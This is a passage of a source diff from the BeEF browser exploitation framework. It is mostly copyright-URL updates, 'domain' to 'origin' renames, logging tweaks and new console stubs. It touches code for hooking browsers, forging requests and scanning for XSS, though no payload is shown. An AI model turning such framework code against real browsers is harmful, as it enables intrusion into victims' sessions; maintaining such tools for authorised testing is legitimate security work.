                     if (xhr.getAllResponseHeaders()) {
@@ -460,7 +460,7 @@ beef.net = {
                     }
 
                 } else {
-                    // same-domain request
+                    // same-origin request
                     response.status_code = xhr.status;
                     response.status_text = textStatus;
                     response.headers = xhr.getAllResponseHeaders();

core/main/client/net/connection.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/net/dns.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/net/local.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/net/portscanner.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/net/requester.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -25,7 +25,7 @@ beef.net.requester = {
             request = requests_array[i];
             if (request.proto == 'https') var scheme = 'https'; else var scheme = 'http';
             beef.debug('[Requester] ' + request.method + ' ' + scheme + '://' + request.host + ':' + request.port + request.uri + ' - Data: ' + request.data);
-            beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
+            beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossOrigin, request.id,
                                        function(res, requestid) { beef.net.send('/requester', requestid, {
                                            response_data: res.response_body,
                                            response_status_code: res.status_code,

core/main/client/net/xssrays.js

@@ -171,7 +171,7 @@ beef.net.xssrays = {
                 this.xss({href:url.href, pathname:url.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,
                     search:url.search, type: 'url'});//scan each link & param
             } else {
-                beef.debug('Scan is not Cross-domain.  URLS\nurl :' + url.hostname.toString());
+                beef.debug('Scan is not Cross-origin.  URLS\nurl :' + url.hostname.toString());
                 beef.debug('\nlocation :' + location.hostname.toString());
             }
         }
@@ -251,7 +251,7 @@ beef.net.xssrays = {
                             continue;
                         }
                         if (!this.crossDomain && (this.host(action).toString() != this.host(location.toString()))) {
-                            beef.debug('Scan is not Cross-domain. FormPost\naction :' + this.host(action).toString());
+                            beef.debug('Scan is not Cross-origin. FormPost\naction :' + this.host(action).toString());
                             beef.debug('location :' + this.host(location));
                             continue;
                         }

core/main/client/os.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/session.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/timeout.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/updater.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/webrtc.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/websocket.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/command.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/configuration.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
@@ -26,7 +26,6 @@ module BeEF
         begin
           # open base config
           @config = load(config)
-          # set default value if key? does not exist
           @config.default = nil
           @@config = config
         rescue StandardError => e
@@ -72,10 +71,12 @@ module BeEF
 
         return unless validate_public_config_variable?(@config)
 
+        # Note for developers:
+        # The configuration path 'beef.http.public_port' is deprecated.
+        # Use the new format for public_port variables as described in the BeEF project documentation.
+        # Refer to the BeEF configuration guide for the web server configuration details:
+        # https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration
         if @config['beef']['http']['public_port']
-          print_error 'Config path beef.http.public_port is deprecated.'
-          print_error 'Please use the new format for public variables found'
-          print_error 'https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration'
           return
         end
 
@@ -154,7 +155,7 @@ module BeEF
         "#{beef_proto}://#{beef_host}:#{beef_port}"
       end
 
-      # Returns the hool path value stored in the config file
+      # Returns the hook path value stored in the config file
       #
       # @return [String] hook file path
       def hook_file_path
@@ -255,7 +256,7 @@ module BeEF
       #
       def load_modules_config
         set('beef.module', {})
-        # support nested sub-categories, like browser/hooked_domain/ajax_fingerprint
+        # support nested sub-categories, like browser/hooked_origin/ajax_fingerprint
         module_configs = File.join("#{$root_dir}/modules/**", 'config.yaml')
         Dir.glob(module_configs) do |cf|
           y = load(cf)
@@ -277,13 +278,15 @@ module BeEF
 
       private
 
+      # Note for developers:
+      # The configuration path 'beef.http.public' is deprecated.
+      # Use the new format for public variables as described in the BeEF project documentation.
+      # Refer to the BeEF configuration guide for the web server configuration details:
+      # https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration
       def validate_public_config_variable?(config)
         return true if config['beef']['http']['public'].is_a?(Hash) ||
                        config['beef']['http']['public'].is_a?(NilClass)
 
-        print_error 'Config path beef.http.public is deprecated.'
-        print_error 'Please use the new format for public variables found'
-        print_error 'https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration'
         false
       end
     end

core/main/console/banners.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -32,7 +32,7 @@ module BeEF
             print_info "Browser Exploitation Framework (BeEF) #{version}"
             data = "Twit: @beefproject\n"
             data += "Site: https://beefproject.com\n"
-            data += "Blog: http://blog.beefproject.com\n"
+            # data += "Blog: http://blog.beefproject.com\n"
             data += "Wiki: https://github.com/beefproject/beef/wiki\n"
             print_more data
             print_info 'Project Creator: ' + 'Wade Alcorn'.red + ' (@WadeAlcorn)'
@@ -134,6 +134,29 @@ module BeEF
               print_info "Starting WebSocketSecure server on wss://[#{config.beef_host}:#{config.get('beef.http.websocket.secure_port').to_i} [timer: #{ws_poll_timeout}]"
             end
           end
+
+          # Print WebSocket servers
+          #
+          def print_http_proxy
+            config = BeEF::Core::Configuration.instance
+            print_info "HTTP Proxy: http://#{config.get('beef.extension.proxy.address')}:#{config.get('beef.extension.proxy.port')}"
+          end
+
+          def print_dns
+            address = nil
+            port = nil
+            protocol = nil
+
+            # TODO: fix the following reference - extensions/dns/api.rb
+            # servers, interfaces, address, port, protocol, upstream_servers = get_dns_config # get the DNS configuration
+
+            # Print the DNS server information
+            unless address.nil? || port.nil? || protocol.nil?
+              print_info "DNS Server: #{address}:#{port} (#{protocol})"
+              print_more upstream_servers unless upstream_servers.empty?
+            end
+          end
+
         end
       end
     end

core/main/console/commandline.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/constants/browsers.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/constants/commandmodule.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/constants/hardware.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/constants/os.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/crypto.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 require 'securerandom'

core/main/geoip.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
@@ -18,7 +18,7 @@ module BeEF
         geoip_file = @config.get('beef.geoip.database')
 
         unless File.exist? geoip_file
-          print_error "[GeoIP] Could not find MaxMind GeoIP database: '#{geoip_file}'"
+          BeEF::Core::Logger.instance.register('System', "[GeoIP] Could not find MaxMind GeoIP database: '#{geoip_file}'")
           @enabled = false
           return
         end

core/main/handlers/browserdetails.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -400,6 +400,8 @@ module BeEF
           browser_plugins = get_param(@data['results'], 'browser.plugins')
           if BeEF::Filters.is_valid_browser_plugins?(browser_plugins)
             BD.set(session_id, 'browser.plugins', browser_plugins)
+          elsif browser_plugins == "[]"
+            err_msg "No browser plugins detected."
           else
             err_msg "Invalid browser plugins returned from the hook browser's initial connection."
           end
@@ -547,7 +549,7 @@ module BeEF
           end
 
           # log a few info of newly hooked zombie in the console
-          print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, browser:#{browser_name}-#{browser_version}, os:#{os_name}-#{os_version}], hooked domain [#{log_zombie_domain}:#{log_zombie_port}]"
+          print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, browser:#{browser_name}-#{browser_version}, os:#{os_name}-#{os_version}], hooked origin [#{log_zombie_domain}:#{log_zombie_port}]"
 
           # add localhost as network host
           if config.get('beef.extension.network.enable')

core/main/handlers/commands.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/handlers/hookedbrowsers.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/handlers/modules/beefjs.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -19,7 +19,7 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w[lib/jquery-1.12.4.min.js lib/jquery-migrate-1.4.1.js lib/evercookie.js lib/json2.js lib/mdetect.js lib/platform.js lib/jquery.blockUI.js]
+            ext_js_sub_files = %w[lib/jquery-1.12.4.min.js lib/jquery-migrate-1.4.1.js lib/evercookie.js lib/json2.js lib/mdetect.js lib/platform.js lib/jquery.blockUI.js lib/bowser-2.11.0.min.js]
 
             # @note BeEF libraries: need Eruby evaluation and obfuscation
             beef_js_sub_files = %w[beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js

core/main/handlers/modules/command.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -73,7 +73,7 @@ module BeEF
               # content = command_module.output.gsub('//
               # //
               # //   Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-              # //   Browser Exploitation Framework (BeEF) - http://beefproject.com
+              # //   Browser Exploitation Framework (BeEF) - https://beefproject.com
               # //   See the file 'doc/COPYING' for copying permission
               # //
               # //', "")

core/main/handlers/modules/legacybeefjs.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -19,7 +19,7 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w[lib/jquery-1.12.4.min.js lib/jquery-migrate-1.4.1.js lib/evercookie.js lib/json2.js lib/mdetect.js lib/platform.js lib/jquery.blockUI.js]
+            ext_js_sub_files = %w[lib/jquery-1.12.4.min.js lib/jquery-migrate-1.4.1.js lib/evercookie.js lib/json2.js lib/mdetect.js lib/platform.js lib/jquery.blockUI.js lib/bowser-2.11.0.min.js]
 
             # @note BeEF libraries: need Eruby evaluation and obfuscation
             beef_js_sub_files = %w[beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js

core/main/handlers/modules/multistagebeefjs.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -19,7 +19,7 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w[lib/jquery-1.12.4.min.js lib/jquery-migrate-1.4.1.js lib/evercookie.js lib/json2.js lib/mdetect.js lib/platform.js lib/jquery.blockUI.js]
+            ext_js_sub_files = %w[lib/jquery-1.12.4.min.js lib/jquery-migrate-1.4.1.js lib/evercookie.js lib/json2.js lib/mdetect.js lib/platform.js lib/jquery.blockUI.js lib/bowser-2.11.0.min.js]
 
             # @note BeEF libraries: need Eruby evaluation and obfuscation
             beef_js_sub_files = %w[beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js

core/main/logger.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/migration.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/model.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/models/browserdetails.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/models/command.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/models/commandmodule.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/models/execution.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/models/hookedbrowser.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/models/legacybrowseruseragents.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/models/log.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/models/optioncache.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/models/result.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/models/rule.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #